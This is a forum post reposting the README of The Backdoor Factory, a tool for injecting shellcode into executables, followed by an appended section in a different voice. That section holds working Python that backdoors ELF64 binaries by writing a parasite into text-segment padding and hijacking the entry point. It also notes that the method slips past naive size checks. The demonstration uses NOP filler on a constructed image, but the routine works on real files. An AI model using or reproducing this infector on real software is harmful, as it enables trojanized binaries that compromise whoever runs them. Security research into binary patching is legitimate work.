Nytro Posted November 25, 2014

The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

DerbyCon 2014 Presentation:

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @Midnite_runr

Under a BSD 3 Clause License

See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki

Dependencies:
Capstone, using the 'next' repo until it is the 'master' repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/

INSTALL:
./install.sh
This will install Capstone with the 'next' repo and use pip to install pefile.

UPDATE:
./update.sh

Supporting: Windows PE x86/x64, ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), and Mach-O x86/x64 and those formats in FAT files
Packed Files: PE UPX x86/x64
Experimental: OpenBSD x32

Some executables have built-in protections; as such, this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I'm on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org-- Without him, I would still be trying to do stupid things with the ELF format. Also thanks to Silvio Cesare with his 1998 paper (Silvio Cesare 'Unix ELF parasites and virus' (VX heaven)), which these ELF patching techniques are based on.

From DerbyCon:
Video:
Injection Module Demo:
Slides: Patching Windows Executables with the Backdoor Factory | DerbyCon 2013

Source: https://github.com/secretsquirrel/the-backdoor-factory
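The post names Silvio Cesare's ELF parasite technique as the basis of BDF's ELF patching. The example below is added here to show the core of that technique (text-segment padding infection) in working Python; it is not BDF's code and is far simpler than what BDF does (no Capstone disassembly, no PE/Mach-O, no packer handling). It builds a constructed, minimal ELF64 x86-64 image in memory, locates the page-alignment padding that follows the executable PT_LOAD segment in the file, writes a parasite there (a stand-in payload of NOPs followed by a `jmp` back to the original entry point), grows the text segment's `p_filesz`/`p_memsz` to cover it, and repoints `e_entry` at the parasite. The image, the payload and all function names (`build_sample_elf`, `find_text_padding`, `backdoor`, `jmp_rel32`) are assumptions of this example, not part of BDF.

```python
import struct
from collections import namedtuple

# ELF64 little-endian header layouts (System V ABI). EHDR is 64 bytes, PHDR 56 bytes.
EHDR_FMT = "<4sBBBBB7xHHIQQQIHHHHHH"
PHDR_FMT = "<IIQQQQQQ"
EHDR_SIZE = struct.calcsize(EHDR_FMT)
PHDR_SIZE = struct.calcsize(PHDR_FMT)
PT_LOAD, PF_X, PF_W, PF_R = 1, 1, 2, 4

Ehdr = namedtuple("Ehdr", "magic ei_class ei_data ei_version ei_osabi ei_abiversion "
                  "e_type e_machine e_version e_entry e_phoff e_shoff e_flags "
                  "e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx")
Phdr = namedtuple("Phdr", "p_type p_flags p_offset p_vaddr p_paddr p_filesz p_memsz p_align")


def build_sample_elf():
    """Constructed sample (not a real binary): ELF64 x86-64, two PT_LOAD segments.
    Text occupies file offsets 0..0x1200; the data segment starts at the next page
    boundary (0x2000), so 0xe00 bytes of padding sit between them in the file."""
    text_vaddr, text_filesz = 0x400000, 0x1200
    data_off, data_vaddr, data_filesz = 0x2000, 0x602000, 0x100
    entry = text_vaddr + 0x1000          # original entry point
    img = bytearray(data_off + data_filesz)
    struct.pack_into(EHDR_FMT, img, 0, b"\x7fELF", 2, 1, 1, 0, 0,
                     2, 62, 1, entry, EHDR_SIZE, 0, 0,
                     EHDR_SIZE, PHDR_SIZE, 2, 0, 0, 0)
    struct.pack_into(PHDR_FMT, img, EHDR_SIZE, PT_LOAD, PF_R | PF_X,
                     0, text_vaddr, text_vaddr, text_filesz, text_filesz, 0x1000)
    struct.pack_into(PHDR_FMT, img, EHDR_SIZE + PHDR_SIZE, PT_LOAD, PF_R | PF_W,
                     data_off, data_vaddr, data_vaddr, data_filesz, data_filesz, 0x1000)
    img[0x1000] = 0xC3                   # 'ret' at the original entry, so the host is recognisable
    return bytes(img)


def parse(data):
    """Return (Ehdr, [Phdr]) for a little-endian ELF64 image."""
    eh = Ehdr(*struct.unpack_from(EHDR_FMT, data, 0))
    if eh.magic != b"\x7fELF" or eh.ei_class != 2 or eh.ei_data != 1:
        raise ValueError("not a little-endian ELF64 image")
    phs = [Phdr(*struct.unpack_from(PHDR_FMT, data, eh.e_phoff + i * eh.e_phentsize))
           for i in range(eh.e_phnum)]
    return eh, phs


def find_text_padding(data):
    """Locate the slack after the executable PT_LOAD segment.
    Returns (phdr index, file offset, virtual address, bytes available)."""
    _, phs = parse(data)
    text_idx = next(i for i, p in enumerate(phs) if p.p_type == PT_LOAD and p.p_flags & PF_X)
    text = phs[text_idx]
    end_off = text.p_offset + text.p_filesz
    # Padding extends to the file offset of the next loadable segment.
    following = [p.p_offset for p in phs if p.p_type == PT_LOAD and p.p_offset >= end_off]
    if not following:
        raise ValueError("text segment is the last loadable segment; no padding to use")
    return text_idx, end_off, text.p_vaddr + text.p_filesz, min(following) - end_off


def jmp_rel32(from_addr, to_addr):
    """x86-64 'jmp rel32' (opcode E9); displacement is relative to the end of the 5-byte insn."""
    return b"\xe9" + struct.pack("<i", to_addr - (from_addr + 5))


def backdoor(data, payload):
    """Write payload + jmp-to-original-entry into the text padding and redirect e_entry.
    The payload must preserve registers/stack if the host is to continue normally."""
    eh, phs = parse(data)
    text_idx, ins_off, ins_vaddr, available = find_text_padding(data)
    stub = payload + jmp_rel32(ins_vaddr + len(payload), eh.e_entry)
    if len(stub) > available:
        raise ValueError(f"parasite needs {len(stub)} bytes, only {available} of padding")
    out = bytearray(data)
    out[ins_off:ins_off + len(stub)] = stub
    # Grow the text segment so the loader maps the parasite, then hijack the entry point.
    t = phs[text_idx]
    grown = t._replace(p_filesz=t.p_filesz + len(stub), p_memsz=t.p_memsz + len(stub))
    struct.pack_into(PHDR_FMT, out, eh.e_phoff + text_idx * eh.e_phentsize, *grown)
    struct.pack_into(EHDR_FMT, out, 0, *eh._replace(e_entry=ins_vaddr))
    return bytes(out)


if __name__ == "__main__":
    sample = build_sample_elf()
    idx, off, va, room = find_text_padding(sample)
    print(f"text phdr #{idx}: padding at 0x{off:x} (va 0x{va:x}), {room} bytes free")
    patched = backdoor(sample, b"\x90" * 4)   # constructed stand-in for user shellcode
    print(f"new e_entry = 0x{parse(patched)[0].e_entry:x}")
```

Because the parasite lives in padding that was already inside the text segment's page, the file does not grow and no other segment offsets move, which is why this variant is quiet against naive size checks. It is also why the post's advice to test targets first matters: a binary whose text segment is the last PT_LOAD, or whose padding is smaller than the payload, cannot be patched this way, and a host with its own integrity checks (the NSIS case the post mentions) will notice the changed entry point regardless.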